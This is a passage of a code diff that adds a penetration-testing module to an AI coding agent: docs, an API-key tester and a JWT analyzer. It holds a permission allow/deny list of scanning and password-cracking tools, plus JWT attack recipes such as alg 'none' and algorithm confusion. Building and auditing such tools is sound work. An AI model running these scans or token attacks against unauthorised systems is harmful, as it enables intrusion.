+    outcome: Outcome.describe("Detailed outcome"),
+    targets: z.array(Target).describe("Extracted targets"),
+    matchedPolicy: z.string().optional().describe("Policy that matched"),
+    reason: z.string().optional().describe("Explanation"),
+  })
+  export type CheckResult = z.infer<typeof CheckResult>
+
+  /**
+   * Bus events for governance notifications.
+   *
+   * These events are published after each governance check, enabling
+   * real-time monitoring and alerting on governance decisions.
+   *
+   * @property Checked - Published after every governance check
+   * @property PolicyViolation - Published when a tool is denied by governance
+   *
+   * @example
+   * ```typescript
+   * // Subscribe to all governance checks
+   * Bus.subscribe(GovernanceTypes.Event.Checked, ({ entry }) => {
+   *   console.log(`Tool ${entry.tool} was ${entry.outcome}`)
+   * })
+   *
+   * // Subscribe to policy violations only
+   * Bus.subscribe(GovernanceTypes.Event.PolicyViolation, ({ entry, policy }) => {
+   *   alert(`Policy violation: ${policy}`)
+   * })
+   * ```
+   */
+  export const Event = {
+    /** Published after every governance check completes */
+    Checked: BusEvent.define(
+      "governance.checked",
+      z.object({
+        entry: AuditEntry,
+      })
+    ),
+    /** Published when a tool execution is denied by governance */
+    PolicyViolation: BusEvent.define(
+      "governance.policy_violation",
+      z.object({
+        entry: AuditEntry,
+        policy: z.string(),
+      })
+    ),
+  }
+}
diff --git a/packages/opencode/src/index.ts b/packages/opencode/src/index.ts
index 6dc5e99e91e..093ff8075c4 100644
--- a/packages/opencode/src/index.ts
+++ b/packages/opencode/src/index.ts
@@ -41,7 +41,7 @@ process.on("uncaughtException", (e) => {
 
 const cli = yargs(hideBin(process.argv))
   .parserConfiguration({ "populate--": true })
-  .scriptName("opencode")
+  .scriptName("cyxwiz")
   .wrap(100)
   .help("help", "show help")
   .alias("help", "h")
@@ -68,9 +68,9 @@ const cli = yargs(hideBin(process.argv))
     })
 
     process.env.AGENT = "1"
-    process.env.OPENCODE = "1"
+    process.env.CYXWIZ = "1"
 
-    Log.Default.info("opencode", {
+    Log.Default.info("cyxwiz", {
       version: Installation.VERSION,
       args: process.argv.slice(2),
     })
diff --git a/packages/opencode/src/pentest/PENTEST.md b/packages/opencode/src/pentest/PENTEST.md
new file mode 100644
index 00000000000..7693161d2ac
--- /dev/null
+++ b/packages/opencode/src/pentest/PENTEST.md
@@ -0,0 +1,414 @@
+# Pentest Module Documentation
+
+This document describes the penetration testing module for cyxwiz, which provides security scanning, vulnerability assessment, and findings management capabilities.
+
+---
+
+## Table of Contents
+
+- [Overview](#overview)
+- [Architecture](#architecture)
+- [Components](#components)
+- [Tools](#tools)
+- [Configuration](#configuration)
+- [Usage](#usage)
+- [Integration with Governance](#integration-with-governance)
+
+---
+
+## Overview
+
+The pentest module provides penetration testing capabilities similar to what you would find on Kali Linux or Parrot OS. It integrates with the cyxwiz governance system to enforce scope restrictions and provides structured output with findings management.
+
+### Key Features
+
+- **Nmap Integration**: Full nmap support with XML output parsing
+- **Security Tools Wrapper**: Access to 30+ common security tools
+- **Findings Management**: Store, query, and track security findings
+- **Governance Integration**: Scope enforcement for authorized targets
+- **LLM Analysis**: AI-powered explanation of scan results
+
+---
+
+## Architecture
+
+```
+┌─────────────────────────────────────────────────────────────────┐
+│                       Pentest Module                            │
+│                                                                 │
+│  ┌─────────────┐  ┌─────────────┐  ┌─────────────┐             │
+│  │  Nmap Tool  │  │  SecTools   │  │  Findings   │             │
+│  │  (scanning) │  │  (wrapper)  │  │  (storage)  │             │
+│  └──────┬──────┘  └──────┬──────┘  └──────┬──────┘             │
+│         │                │                │                     │
+│         ▼                ▼                ▼                     │
+│  ┌─────────────────────────────────────────────────┐           │
+│  │              NmapParser (XML parsing)           │           │
+│  └─────────────────────────────────────────────────┘           │
+│         │                                                       │
+│         ▼                                                       │
+│  ┌─────────────────────────────────────────────────┐           │
+│  │          Governance (scope enforcement)         │           │
+│  └─────────────────────────────────────────────────┘           │
+└─────────────────────────────────────────────────────────────────┘
+```
+
+---
+
+## Components
+
+### 1. Types (`types.ts`)
+
+Defines core types using Zod schemas:
+
+| Type | Description |
+|------|-------------|
+| `Severity` | Finding severity levels (critical, high, medium, low, info) |
+| `FindingStatus` | Finding lifecycle status (open, confirmed, mitigated, false_positive) |
+| `ScanType` | Types of scans (port, service, vuln, web, custom) |
+| `PortState` | Port states from nmap (open, closed, filtered, etc.) |
+| `Port` | Individual port scan result |
+| `Host` | Host information with ports and OS detection |
+| `ScanResult` | Complete scan result with all hosts |
+| `Finding` | Security finding with severity and remediation |
+
+### 2. Nmap Parser (`nmap-parser.ts`)
+
+Parses nmap XML output into structured data:
+
+| Function | Purpose |
+|----------|---------|
+| `parse()` | Parse nmap XML into ScanResult |
+| `formatResult()` | Format scan result as human-readable text |
+| `summarize()` | Generate concise scan summary |
+
+### 3. Findings (`findings.ts`)
+
+Manages storage and retrieval of security findings:
+
+| Function | Purpose |
+|----------|---------|
+| `create()` | Create a new finding |
+| `update()` | Update existing finding |
+| `get()` | Retrieve finding by ID |
+| `list()` | List findings with filters |
+| `remove()` | Delete a finding |
+| `saveScan()` | Save scan result |
+| `getScan()` | Retrieve scan result |
+| `listScans()` | List scan results |
+| `analyzeAndCreateFindings()` | Auto-generate findings from scan |
+
+### 4. Nmap Tool (`nmap-tool.ts`)
+
+Dedicated nmap tool with full feature support:
+
+| Parameter | Description |
+|-----------|-------------|
+| `target` | IP, hostname, or CIDR range |
+| `ports` | Port specification (e.g., "22,80,443") |
+| `serviceDetection` | Enable -sV service detection |
+| `timing` | Timing template (0-5) |
+| `udpScan` | Include UDP scanning |
+| `osDetection` | Enable OS detection |
+| `scriptScan` | Run default NSE scripts |
+| `analyzeFindings` | Auto-create findings |
+
+### 5. Security Tools (`sectools.ts`)
+
+Wrapper for 30+ common security tools:
+
+**Network Reconnaissance:**
+- nmap, masscan, netcat (nc)
+
+**Web Scanning:**
+- nikto, dirb, gobuster, ffuf, wpscan, whatweb, wafw00f
+
+**Vulnerability Scanning:**
+- nuclei, searchsploit
+
+**SQL Injection:**
+- sqlmap
+
+**SMB/Windows:**
+- enum4linux, smbclient, crackmapexec, rpcclient
+
+**SSL/TLS:**
+- sslscan, sslyze, testssl
+
+**DNS:**
+- dnsenum, dnsrecon, fierce, dig, host, whois
+
+---
+
+## Tools
+
+### Nmap Tool
+
+The `nmap` tool provides structured port scanning:
+
+```typescript
+// Example nmap scan
+const result = await nmap.execute({
+  target: "192.168.1.1",
+  ports: "1-1000",
+  serviceDetection: true,
+  timing: 3,
+})
+
+// Result includes:
+// - Parsed hosts and ports
+// - Service information
+// - Auto-generated findings
+```
+
+### SecTools Tool
+
+The `sectools` tool wraps common security utilities:
+
+```typescript
+// Nikto web scan
+const result = await sectools.execute({
+  tool: "nikto",
+  target: "http://example.com",
+  args: "-Tuning 1",
+})
+
+// Gobuster directory scan
+const result = await sectools.execute({
+  tool: "gobuster",
+  target: "http://example.com",
+  args: "dir -w /usr/share/wordlists/dirb/common.txt",
+})
+
+// SSL analysis
+const result = await sectools.execute({
+  tool: "sslscan",
+  target: "example.com",
+})
+```
+
+---
+
+## Configuration
+
+### Pentest Agent Permissions
+
+The pentest agent has pre-configured permissions for security tools:
+
+```typescript
+bash: {
+  // Network reconnaissance
+  "nmap *": "allow",
+  "ping *": "allow",
+  "traceroute *": "allow",
+  "masscan *": "allow",
+
+  // Web scanning
+  "nikto *": "allow",
+  "dirb *": "allow",
+  "gobuster *": "allow",
+  "sqlmap *": "allow",
+
+  // SMB/Windows
+  "enum4linux *": "allow",
+  "smbclient *": "allow",
+
+  // SSL/TLS
+  "sslscan *": "allow",
+  "sslyze *": "allow",
+
+  // Blocked by default (too risky)
+  "hashcat *": "deny",
+  "john *": "deny",
+  "hydra *": "deny",
+}
+```
+
+### Governance Scope
+
+Governance scope restrictions apply to all pentest tools:
+
+```json
+{
+  "governance": {
+    "enabled": true,
+    "scope": {
+      "ip": {
+        "allow": ["10.0.0.0/8", "192.168.0.0/16"],
+        "deny": ["0.0.0.0/8"]
+      },
+      "domain": {
+        "allow": ["*.internal.company.com"],
+        "deny": ["*.prod.company.com"]
+      }
+    }
+  }
+}
+```
+
+---
+
+## Usage
+
+### Using the Pentest Agent
+
+The pentest agent can be invoked with `@pentest`:
+
+```
+@pentest Scan ports on 192.168.1.1
+@pentest Check web vulnerabilities on http://example.com
+@pentest Enumerate SMB on 192.168.1.100
+@pentest Analyze SSL/TLS configuration on example.com
+```
+
+### Direct Tool Usage
+
+Tools can also be used directly:
+
+```typescript
+// Nmap scan
+const scanResult = await tools.nmap.execute({
+  target: "192.168.1.0/24",
+  serviceDetection: true,
+})
+
+// Access findings
+const findings = await Findings.list({}, {
+  sessionID: currentSession,
+  severity: "high",
+})
+```
+
+### Example Workflow
+
+1. **Network Discovery**
+   ```
+   @pentest Discover hosts on 192.168.1.0/24
+   ```
+
+2. **Port Scanning**
+   ```
+   @pentest Detailed port scan on discovered hosts
+   ```
+
+3. **Service Enumeration**
+   ```
+   @pentest Check for vulnerable services
+   ```
+
+4. **Web Assessment** (if web servers found)
+   ```
+   @pentest Run nikto and gobuster on web servers
+   ```
+
+5. **Report Generation**
+   ```
+   @pentest Summarize all findings with recommendations
+   ```
+
+---
+
+## Integration with Governance
+
+The pentest module integrates with governance for scope enforcement:
+
+### Target Validation
+
+Before any scan, targets are validated against governance scope:
+
+1. **IP/CIDR targets**: Checked against `scope.ip.allow` and `scope.ip.deny`
+2. **Domain targets**: Checked against `scope.domain.allow` and `scope.domain.deny`
+3. **URL targets**: Hostname extracted and checked against domain scope
+
+### Audit Trail
+
+All scans are recorded in the governance audit log:
+
+```typescript
+// Audit entries include:
+{
+  tool: "nmap",
+  targets: ["192.168.1.1"],
+  outcome: "allowed",
+  duration: 5000,
+}
+```
+
+### Policy Integration
+
+Governance policies can control pentest tool access:
+
+```json
+{
+  "policies": [
+    {
+      "description": "Allow pentesting internal networks",
+      "action": "auto-approve",
+      "tools": ["nmap", "sectools"],
+      "targets": ["192.168.*", "10.*"]
+    },
+    {
+      "description": "Block external scanning",
+      "action": "blocked",
+      "tools": ["nmap", "sectools"],
+      "targets": ["*.com", "*.org"]
+    }
+  ]
+}
+```
+
+---
+
+## Files
+
+| File | Purpose |
+|------|---------|
+| `types.ts` | Type definitions |
+| `nmap-parser.ts` | Nmap XML parser |
+| `findings.ts` | Findings storage |
+| `nmap-tool.ts` | Nmap tool |
+| `sectools.ts` | Security tools wrapper |
+| `index.ts` | Module exports |
+| `prompt/pentest.txt` | Agent system prompt |
+
+---
+
+## Events
+
+The pentest module publishes bus events:
+
+| Event | Description |
+|-------|-------------|
+| `pentest.scan_started` | Scan has begun |
+| `pentest.scan_completed` | Scan has finished |
+| `pentest.finding_created` | New finding created |
+| `pentest.finding_updated` | Finding was updated |
+
+---
+
+## Testing
+
+Tests are located in `test/pentest/pentest.test.ts`:
+
+```bash
+cd packages/opencode
+bun test test/pentest/pentest.test.ts
+```
+
+Test coverage includes:
+- Nmap XML parsing
+- Findings CRUD operations
+- Type validation
+- Memory storage mode
+
+---
+
+## Dependencies
+
+| Dependency | Usage |
+|------------|-------|
+| `Storage` | Finding persistence |
+| `Bus` | Event publishing |
+| `Identifier` | Unique ID generation |
+| `Log` | Structured logging |
+| `GovernanceMatcher` | Target classification |
diff --git a/packages/opencode/src/pentest/apiscan/auth/apikey.ts b/packages/opencode/src/pentest/apiscan/auth/apikey.ts
new file mode 100644
index 00000000000..35edd27647d
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/auth/apikey.ts
@@ -0,0 +1,380 @@
+/**
+ * @fileoverview API Key Testing
+ *
+ * Tests API key authentication for common vulnerabilities.
+ *
+ * @module pentest/apiscan/auth/apikey
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.apikey" })
+
+/**
+ * API key test result.
+ */
+export interface ApiKeyTestResult {
+  valid: boolean
+  issues: string[]
+  recommendations: string[]
+  tests: {
+    name: string
+    passed: boolean
+    description: string
+  }[]
+}
+
+/**
+ * API key tester namespace.
+ */
+export namespace ApiKeyTester {
+  /**
+   * Test an API key for common vulnerabilities.
+   *
+   * @param endpoint - Endpoint to test
+   * @param apiKey - API key configuration
+   * @param baseUrl - Base URL
+   * @param timeout - Request timeout
+   * @returns Test result
+   */
+  export async function test(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    apiKey: ApiScanTypes.ApiKeyConfig,
+    baseUrl: string,
+    timeout = 10000
+  ): Promise<ApiKeyTestResult> {
+    log.info("Testing API key authentication", { endpoint: endpoint.path, header: apiKey.header })
+
+    const tests: ApiKeyTestResult["tests"] = []
+    const issues: string[] = []
+    const recommendations: string[] = []
+
+    // Test 1: Valid key works
+    const validKeyTest = await testValidKey(endpoint, apiKey, baseUrl, timeout)
+    tests.push(validKeyTest)
+    if (!validKeyTest.passed) {
+      issues.push("API key does not work for authenticated request")
+    }
+
+    // Test 2: Missing key is rejected
+    const missingKeyTest = await testMissingKey(endpoint, baseUrl, timeout)
+    tests.push(missingKeyTest)
+    if (!missingKeyTest.passed) {
+      issues.push("Endpoint accepts requests without API key")
+      recommendations.push("Ensure all protected endpoints require authentication")
+    }
+
+    // Test 3: Invalid key is rejected
+    const invalidKeyTest = await testInvalidKey(endpoint, apiKey.header, baseUrl, timeout)
+    tests.push(invalidKeyTest)
+    if (!invalidKeyTest.passed) {
+      issues.push("Endpoint accepts invalid API keys")
+      recommendations.push("Validate API keys properly before processing requests")
+    }
+
+    // Test 4: Key in different location
+    const locationTest = await testKeyLocation(endpoint, apiKey, baseUrl, timeout)
+    tests.push(locationTest)
+    if (!locationTest.passed) {
+      recommendations.push("Consider accepting API key only in secure header location")
+    }
+
+    // Test 5: Key entropy check
+    const entropyTest = checkKeyEntropy(apiKey.value)
+    tests.push(entropyTest)
+    if (!entropyTest.passed) {
+      issues.push("API key has low entropy")
+      recommendations.push("Use cryptographically secure random keys with sufficient length")
+    }
+
+    // Test 6: Common weak keys
+    const weakKeyTest = checkWeakKey(apiKey.value)
+    tests.push(weakKeyTest)
+    if (!weakKeyTest.passed) {
+      issues.push("API key matches common weak patterns")
+      recommendations.push("Avoid using predictable or common API keys")
+    }
+
+    const valid = tests.every((t) => t.passed)
+
+    log.info("API key testing complete", {
+      valid,
+      testsPassed: tests.filter((t) => t.passed).length,
+      testsTotal: tests.length,
+    })
+
+    return { valid, issues, recommendations, tests }
+  }
+
+  /**
+   * Test that valid key works.
+   */
+  async function testValidKey(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    apiKey: ApiScanTypes.ApiKeyConfig,
+    baseUrl: string,
+    timeout: number
+  ): Promise<ApiKeyTestResult["tests"][0]> {
+    try {
+      const url = new URL(endpoint.path, baseUrl).toString()
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        method: endpoint.method,
+        headers: {
+          [apiKey.header]: apiKey.value,
+          Accept: "application/json",
+        },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      const passed = response.status >= 200 && response.status < 300
+      return {
+        name: "Valid Key Test",
+        passed,
+        description: passed
+          ? "Valid API key accepted"
+          : `Valid API key rejected with status ${response.status}`,
+      }
+    } catch {
+      return {
+        name: "Valid Key Test",
+        passed: false,
+        description: "Request failed",
+      }
+    }
+  }
+
+  /**
+   * Test that missing key is rejected.
+   */
+  async function testMissingKey(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    baseUrl: string,
+    timeout: number
+  ): Promise<ApiKeyTestResult["tests"][0]> {
+    try {
+      const url = new URL(endpoint.path, baseUrl).toString()
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        method: endpoint.method,
+        headers: {
+          Accept: "application/json",
+        },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Should get 401 or 403
+      const passed = response.status === 401 || response.status === 403
+      return {
+        name: "Missing Key Test",
+        passed,
+        description: passed
+          ? "Request without API key properly rejected"
+          : `Request without API key returned status ${response.status}`,
+      }
+    } catch {
+      return {
+        name: "Missing Key Test",
+        passed: false,
+        description: "Request failed",
+      }
+    }
+  }
+
+  /**
+   * Test that invalid key is rejected.
+   */
+  async function testInvalidKey(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    header: string,
+    baseUrl: string,
+    timeout: number
+  ): Promise<ApiKeyTestResult["tests"][0]> {
+    try {
+      const url = new URL(endpoint.path, baseUrl).toString()
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url, {
+        method: endpoint.method,
+        headers: {
+          [header]: "invalid-api-key-12345",
+          Accept: "application/json",
+        },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // Should get 401 or 403
+      const passed = response.status === 401 || response.status === 403
+      return {
+        name: "Invalid Key Test",
+        passed,
+        description: passed
+          ? "Invalid API key properly rejected"
+          : `Invalid API key returned status ${response.status}`,
+      }
+    } catch {
+      return {
+        name: "Invalid Key Test",
+        passed: false,
+        description: "Request failed",
+      }
+    }
+  }
+
+  /**
+   * Test if API key can be passed in different locations.
+   */
+  async function testKeyLocation(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    apiKey: ApiScanTypes.ApiKeyConfig,
+    baseUrl: string,
+    timeout: number
+  ): Promise<ApiKeyTestResult["tests"][0]> {
+    // Test if key in query parameter works (less secure)
+    try {
+      const url = new URL(endpoint.path, baseUrl)
+      url.searchParams.set("api_key", apiKey.value)
+      url.searchParams.set("apikey", apiKey.value)
+      url.searchParams.set("key", apiKey.value)
+
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url.toString(), {
+        method: endpoint.method,
+        headers: {
+          Accept: "application/json",
+        },
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      // If query param works, it's a potential issue
+      const queryParamWorks = response.status >= 200 && response.status < 300
+
+      return {
+        name: "Key Location Test",
+        passed: !queryParamWorks,
+        description: queryParamWorks
+          ? "API key accepted in query parameter (less secure)"
+          : "API key in query parameter rejected",
+      }
+    } catch {
+      return {
+        name: "Key Location Test",
+        passed: true,
+        description: "Could not test query parameter location",
+      }
+    }
+  }
+
+  /**
+   * Check API key entropy.
+   */
+  function checkKeyEntropy(key: string): ApiKeyTestResult["tests"][0] {
+    // Simple entropy estimation
+    const uniqueChars = new Set(key).size
+    const length = key.length
+
+    // Rough entropy calculation
+    const entropy = length * Math.log2(uniqueChars)
+
+    // Minimum recommended entropy is ~128 bits
+    const passed = entropy >= 80 && length >= 20
+
+    return {
+      name: "Key Entropy Test",
+      passed,
+      description: passed
+        ? `Sufficient entropy (${Math.round(entropy)} bits, ${length} chars)`
+        : `Low entropy (${Math.round(entropy)} bits, ${length} chars) - recommend 128+ bits`,
+    }
+  }
+
+  /**
+   * Check for weak/common API keys.
+   */
+  function checkWeakKey(key: string): ApiKeyTestResult["tests"][0] {
+    const weakPatterns = [
+      /^test/i,
+      /^demo/i,
+      /^example/i,
+      /^sample/i,
+      /^12345/,
+      /^abcde/i,
+      /^password/i,
+      /^admin/i,
+      /^apikey/i,
+      /^secret/i,
+      /^key$/i,
+    ]
+
+    for (const pattern of weakPatterns) {
+      if (pattern.test(key)) {
+        return {
+          name: "Weak Key Test",
+          passed: false,
+          description: `API key matches weak pattern: ${pattern}`,
+        }
+      }
+    }
+
+    return {
+      name: "Weak Key Test",
+      passed: true,
+      description: "API key does not match common weak patterns",
+    }
+  }
+
+  /**
+   * Format test result for display.
+   *
+   * @param result - Test result
+   * @returns Formatted string
+   */
+  export function format(result: ApiKeyTestResult): string {
+    const lines: string[] = []
+
+    lines.push("API Key Test Results")
+    lines.push("====================")
+    lines.push("")
+    lines.push(`Overall: ${result.valid ? "PASSED" : "FAILED"}`)
+    lines.push("")
+    lines.push("Tests:")
+    for (const test of result.tests) {
+      const status = test.passed ? "[PASS]" : "[FAIL]"
+      lines.push(`  ${status} ${test.name}: ${test.description}`)
+    }
+
+    if (result.issues.length > 0) {
+      lines.push("")
+      lines.push("Issues:")
+      for (const issue of result.issues) {
+        lines.push(`  - ${issue}`)
+      }
+    }
+
+    if (result.recommendations.length > 0) {
+      lines.push("")
+      lines.push("Recommendations:")
+      for (const rec of result.recommendations) {
+        lines.push(`  - ${rec}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/auth/index.ts b/packages/opencode/src/pentest/apiscan/auth/index.ts
new file mode 100644
index 00000000000..ce6d44f0f9d
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/auth/index.ts
@@ -0,0 +1,11 @@
+/**
+ * @fileoverview Authentication Testing Modules
+ *
+ * Exports JWT, API key, and OAuth testing utilities.
+ *
+ * @module pentest/apiscan/auth
+ */
+
+export { JwtAnalyzer } from "./jwt"
+export { ApiKeyTester, type ApiKeyTestResult } from "./apikey"
+export { OAuthTester, type OAuthTestResult } from "./oauth"
diff --git a/packages/opencode/src/pentest/apiscan/auth/jwt.ts b/packages/opencode/src/pentest/apiscan/auth/jwt.ts
new file mode 100644
index 00000000000..bb957ab5790
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/auth/jwt.ts
@@ -0,0 +1,347 @@
+/**
+ * @fileoverview JWT Analysis
+ *
+ * Analyzes JWT tokens for security vulnerabilities and
+ * suggests potential attack vectors.
+ *
+ * @module pentest/apiscan/auth/jwt
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.jwt" })
+
+/**
+ * Weak algorithms that should not be used.
+ */
+const WEAK_ALGORITHMS = ["none", "HS256", "HS384", "HS512"]
+
+/**
+ * Strong algorithms.
+ */
+const STRONG_ALGORITHMS = ["RS256", "RS384", "RS512", "ES256", "ES384", "ES512", "PS256", "PS384", "PS512"]
+
+/**
+ * JWT analyzer namespace.
+ */
+export namespace JwtAnalyzer {
+  /**
+   * Decode and analyze a JWT token.
+   *
+   * @param token - JWT token string
+   * @returns JWT analysis result
+   */
+  export function analyze(token: string): ApiScanTypes.JwtAnalysis {
+    log.info("Analyzing JWT token")
+
+    const parts = token.split(".")
+    if (parts.length !== 3) {
+      throw new Error("Invalid JWT format: expected 3 parts separated by dots")
+    }
+
+    const [headerB64, payloadB64, signature] = parts
+
+    // Decode header and payload
+    const header = decodeBase64Url(headerB64)
+    const payload = decodeBase64Url(payloadB64)
+
+    // Extract standard claims
+    const algorithm = (header.alg as string) || "unknown"
+    const exp = payload.exp as number | undefined
+    const iat = payload.iat as number | undefined
+    const nbf = payload.nbf as number | undefined
+    const iss = payload.iss as string | undefined
+    const sub = payload.sub as string | undefined
+    const aud = payload.aud as string | string[] | undefined
+
+    // Check expiration
+    const now = Math.floor(Date.now() / 1000)
+    const isExpired = exp ? exp < now : false
+
+    // Analyze for issues
+    const issues = checkIssues(header, payload, algorithm)
+    const attackVectors = suggestAttackVectors(header, payload, algorithm)
+
+    const analysis: ApiScanTypes.JwtAnalysis = {
+      raw: token,
+      header,
+      payload,
+      signature,
+      algorithm,
+      isExpired,
+      expiresAt: exp,
+      issuedAt: iat,
+      notBefore: nbf,
+      issuer: iss,
+      subject: sub,
+      audience: aud,
+      issues,
+      attackVectors,
+    }
+
+    log.info("JWT analysis complete", {
+      algorithm,
+      isExpired,
+      issueCount: issues.length,
+      attackVectorCount: attackVectors.length,
+    })
+
+    return analysis
+  }
+
+  /**
+   * Decode base64url encoded string to JSON object.
+   *
+   * @param input - Base64url encoded string
+   * @returns Decoded JSON object
+   */
+  function decodeBase64Url(input: string): Record<string, unknown> {
+    // Add padding if needed
+    let base64 = input.replace(/-/g, "+").replace(/_/g, "/")
+    while (base64.length % 4) {
+      base64 += "="
+    }
+
+    const decoded = Buffer.from(base64, "base64").toString("utf8")
+    return JSON.parse(decoded)
+  }
+
+  /**
+   * Check for security issues in the JWT.
+   *
+   * @param header - JWT header
+   * @param payload - JWT payload
+   * @param algorithm - Algorithm used
+   * @returns Array of issue descriptions
+   */
+  function checkIssues(
+    header: Record<string, unknown>,
+    payload: Record<string, unknown>,
+    algorithm: string
+  ): string[] {
+    const issues: string[] = []
+
+    // Algorithm issues
+    if (algorithm === "none") {
+      issues.push("CRITICAL: Algorithm is 'none' - token is not signed")
+    } else if (algorithm.startsWith("HS")) {
+      issues.push(`WARNING: Using symmetric algorithm ${algorithm} - vulnerable to brute force if secret is weak`)
+    }
+
+    // Header issues
+    if (header.jku) {
+      issues.push("WARNING: jku (JWK Set URL) header present - potential SSRF/key injection")
+    }
+    if (header.x5u) {
+      issues.push("WARNING: x5u (X.509 URL) header present - potential SSRF/key injection")
+    }
+    if (header.kid && typeof header.kid === "string") {
+      if (header.kid.includes("..") || header.kid.includes("/")) {
+        issues.push("WARNING: kid contains path characters - potential path traversal")
+      }
+    }
+
+    // Payload issues
+    const now = Math.floor(Date.now() / 1000)
+
+    if (!payload.exp) {
+      issues.push("WARNING: No expiration (exp) claim - token never expires")
+    } else if ((payload.exp as number) - now > 86400 * 30) {
+      issues.push("WARNING: Token expires in more than 30 days")
+    }
+
+    if (!payload.iat) {
+      issues.push("INFO: No issued-at (iat) claim")
+    }
+
+    if (!payload.iss) {
+      issues.push("INFO: No issuer (iss) claim")
+    }
+
+    if (!payload.sub) {
+      issues.push("INFO: No subject (sub) claim")
+    }
+
+    if (!payload.aud) {
+      issues.push("INFO: No audience (aud) claim")
+    }
+
+    // Check for sensitive data in payload
+    const sensitivePatterns = [/password/i, /secret/i, /ssn/i, /credit/i, /card/i]
+    for (const key of Object.keys(payload)) {
+      for (const pattern of sensitivePatterns) {
+        if (pattern.test(key)) {
+          issues.push(`WARNING: Potentially sensitive field '${key}' in token payload`)
+        }
+      }
+    }
+
+    return issues
+  }
+
+  /**
+   * Suggest potential attack vectors.
+   *
+   * @param header - JWT header
+   * @param payload - JWT payload
+   * @param algorithm - Algorithm used
+   * @returns Array of attack vector descriptions
+   */
+  function suggestAttackVectors(
+    header: Record<string, unknown>,
+    _payload: Record<string, unknown>,
+    algorithm: string
+  ): string[] {
+    const vectors: string[] = []
+
+    // Algorithm confusion attacks
+    if (STRONG_ALGORITHMS.includes(algorithm)) {
+      vectors.push("Algorithm confusion: Try changing alg to HS256 and signing with public key as secret")
+    }
+
+    // None algorithm attack
+    if (algorithm !== "none") {
+      vectors.push("None algorithm: Try setting alg to 'none' and removing signature")
+    }
+
+    // Weak secret brute force
+    if (algorithm.startsWith("HS")) {
+      vectors.push("Brute force: Attempt to crack the HMAC secret using common passwords/wordlists")
+    }
+
+    // JWK/JKU injection
+    if (header.jku || header.x5u) {
+      vectors.push("Key injection: Supply attacker-controlled JWK/X.509 URL")
+    }
+
+    // Kid manipulation
+    if (header.kid) {
+      vectors.push("KID manipulation: Try SQL injection, path traversal, or directory traversal in kid parameter")
+    }
+
+    // Token replay
+    vectors.push("Token replay: Re-use captured token if no additional binding exists")
+
+    // Signature stripping
+    vectors.push("Signature stripping: Remove signature and test if server validates")
+
+    return vectors
+  }
+
+  /**
+   * Check if algorithm is considered weak.
+   *
+   * @param algorithm - JWT algorithm
+   * @returns true if weak
+   */
+  export function isWeakAlgorithm(algorithm: string): boolean {
+    return WEAK_ALGORITHMS.includes(algorithm)
+  }
+
+  /**
+   * Check if token is expired.
+   *
+   * @param analysis - JWT analysis
+   * @returns true if expired
+   */
+  export function isExpired(analysis: ApiScanTypes.JwtAnalysis): boolean {
+    return analysis.isExpired
+  }
+
+  /**
+   * Get time until expiration.
+   *
+   * @param analysis - JWT analysis
+   * @returns Seconds until expiration, or -1 if no exp claim
+   */
+  export function getTimeUntilExpiration(analysis: ApiScanTypes.JwtAnalysis): number {
+    if (!analysis.expiresAt) return -1
+    const now = Math.floor(Date.now() / 1000)
+    return analysis.expiresAt - now
+  }
+
+  /**
+   * Format analysis for display.
+   *
+   * @param analysis - JWT analysis
+   * @returns Formatted string
+   */
+  export function format(analysis: ApiScanTypes.JwtAnalysis): string {
+    const lines: string[] = []
+
+    lines.push("JWT Analysis")
+    lines.push("============")
+    lines.push("")
+    lines.push("Header:")
+    lines.push(`  Algorithm: ${analysis.algorithm}`)
+    for (const [key, value] of Object.entries(analysis.header)) {
+      if (key !== "alg" && key !== "typ") {
+        lines.push(`  ${key}: ${JSON.stringify(value)}`)
+      }
+    }
+
+    lines.push("")
+    lines.push("Payload:")
+    lines.push(`  Issuer: ${analysis.issuer || "(not set)"}`)
+    lines.push(`  Subject: ${analysis.subject || "(not set)"}`)
+    lines.push(`  Audience: ${analysis.audience ? JSON.stringify(analysis.audience) : "(not set)"}`)
+    lines.push(`  Issued At: ${analysis.issuedAt ? new Date(analysis.issuedAt * 1000).toISOString() : "(not set)"}`)
+    lines.push(`  Expires At: ${analysis.expiresAt ? new Date(analysis.expiresAt * 1000).toISOString() : "(not set)"}`)
+    lines.push(`  Expired: ${analysis.isExpired ? "Yes" : "No"}`)
+
+    if (analysis.issues.length > 0) {
+      lines.push("")
+      lines.push("Security Issues:")
+      for (const issue of analysis.issues) {
+        lines.push(`  - ${issue}`)
+      }
+    }
+
+    if (analysis.attackVectors.length > 0) {
+      lines.push("")
+      lines.push("Potential Attack Vectors:")
+      for (const vector of analysis.attackVectors) {
+        lines.push(`  - ${vector}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Create a modified token for testing (without valid signature).
+   *
+   * @param analysis - Original token analysis
+   * @param modifications - Header/payload modifications
+   * @returns Modified token (invalid signature)
+   */
+  export function createTestToken(
+    analysis: ApiScanTypes.JwtAnalysis,
+    modifications: {
+      header?: Record<string, unknown>
+      payload?: Record<string, unknown>
+    }
+  ): string {
+    const newHeader = { ...analysis.header, ...modifications.header }
